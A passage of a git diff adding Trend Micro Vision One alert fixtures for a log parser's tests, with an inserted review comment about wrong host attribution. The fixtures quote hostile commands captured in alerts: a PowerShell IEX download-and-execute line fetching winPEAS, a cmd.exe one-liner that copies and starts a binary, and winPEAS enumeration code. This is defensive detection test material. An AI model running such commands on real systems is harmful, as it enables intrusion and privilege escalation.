[\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": 
[\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}",
+ "event": {
+ "category": [
+ "intrusion_detection"
+ ],
+ "kind": "alert",
+ "reason": "Process Injection from Windows Temporary Location to System32",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-07-23T07:49:48Z",
+ "host": {
+ "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299",
+ "ip": [
+ "19.112.87.74"
+ ],
+ "name": "CHTX-XMEDICA-2K12.windows10.local"
+ },
+ "observer": {
+ "product": "Vision One",
+ "vendor": "TrendMicro"
+ },
+ "process": {
+ "command_line": "SesProbe-31944.exe ",
+ "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe",
+ "hash": {
+ "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F",
+ "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303"
+ },
+ "parent": {
+ "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S",
+ "executable": "C:\\Windows\\System32\\cmd.exe",
+ "hash": {
+ "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502"
+ }
+ },
+ "pid": 5552
+ },
+ "related": {
+ "hash": [
+ "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F",
+ "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303",
+ "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502"
+ ],
+ "ip": [
+ "19.112.87.74"
+ ],
+ "user": [
+ "jdoe"
+ ]
+ },
+ "rule": {
+ "name": "Process Injection from Windows Temporary Location to System32"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-11111-22222222-00000",
+ "incident_id": "IC-14558-20240722-00000",
+ "investigation_status": "New",
+ "severity": "medium",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "windows10",
+ "id": "windows10\\jdoe",
+ "name": "jdoe"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 83d7e99b5..61b294270 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
@@ -20,6 +20,7 @@
 "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0"
 },
 "host": {
+ "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E",
 "ip": [
 "10.10.58.51"
 ],
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
new file mode 100644
index 000000000..e3283fe41
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
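Review bot: The expected `host` block in this fixture pins the injection to `7E8FDBEF-FFF7-4C41-9E33-171366D30299` / `CHTX-XMEDICA-2K12.windows10.local` / `19.112.87.74`, yet in the input that entity carries provenance `["Sweeping"]` only, while every process indicator (objectPid 5552, `SesProbe-31944.exe`, the `cmd.exe` parent) and the `windows10\jdoe` account relate to `E991724A-42D2-44F9-B122-40290A2E9E15` (`PRESTATAIR-2K19`, `1.231.184.40`), the one host whose provenance includes `"Alert"`. As written the test asserts that a detection is attributed to a host that merely matched a sweep, so an analyst pivoting on host.id/host.ip lands on the wrong asset and `related.ip` omits the real one; the parser is not in this hunk, but it presumably takes the first host entity in impactScope rather than preferring an entity with `"Alert"` provenance (or one named in the process indicators' relatedEntities). Once the selection is fixed the expectation here should read `"id": "E991724A-42D2-44F9-B122-40290A2E9E15"`, `"ip": ["1.231.184.40"]`, `"name": "PRESTATAIR-2K19"`, with `related.ip` updated to match.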
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", 
\"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | 
Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n 
if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": 
\"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", 
\"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", 
\"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 
'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n 
}\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], 
\"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:45:28Z", + "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object 
